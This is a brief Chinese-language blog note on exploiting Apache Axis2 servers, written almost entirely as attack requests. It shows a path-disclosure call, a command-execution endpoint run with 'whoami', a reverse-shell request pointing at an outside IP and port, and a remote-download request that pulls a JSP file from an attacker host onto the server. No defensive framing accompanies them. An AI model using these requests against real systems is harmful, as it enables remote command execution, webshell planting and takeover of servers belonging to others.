技术笔记

Axis2漏洞利用

字号+ 作者:蜗蜗侠 来源:原创 2016-11-24 15:37 我要评论( )

axis2漏洞利用......

axis2漏洞利用

getClassPath 爆路径

axis2/services/Cat/exec?cmd=whoam 命令执行

axis2/services/Cat/shell?host=192.168.76.1&port=2222 反弹shell

D:/test/webapps/axis2/WEB-INF/classes/

http://blog.icxun.cn/axis2/services/Cat/exec?cmd=whoami

http://blog.icxun.cn/axis2/services/Cat/getClassPath

http://blog.icxun.cn/axis2/services/config/download?url=http://XXXX或IP:2475/test.jsp&path=路径test.jsp   远程下载


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/207.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~